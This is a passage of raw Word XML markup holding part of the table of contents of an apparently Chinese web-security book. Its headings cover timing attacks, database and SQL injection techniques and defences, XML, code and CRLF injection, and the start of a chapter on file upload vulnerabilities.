        <w:t>153</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2122" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Timing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Attack</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="59" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>击技巧</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>157</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>常见的攻击技巧</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>157</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>命令执行</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>158</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>攻击存储过程</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>164</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>编码问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>165</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Truncation</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>167</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="59" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>确地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注入</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>170</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>使用预编译语句</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>171</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>使用存储过程</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>172</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>检查数据类型</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>172</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>使用安全函数</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>172</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="505"/>
        <w:ind w:left="0" w:right="219" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:w w:val="75"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>XI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="124" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>他注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>攻击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>173</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>注入</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>173</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>代码注入</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>174</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>注入</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>176</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639986pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1624" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:414;width:7261;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>文</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>件</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>上</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>传</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>漏洞</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>180</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>8</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>7.5</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>179</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>件上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>概</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
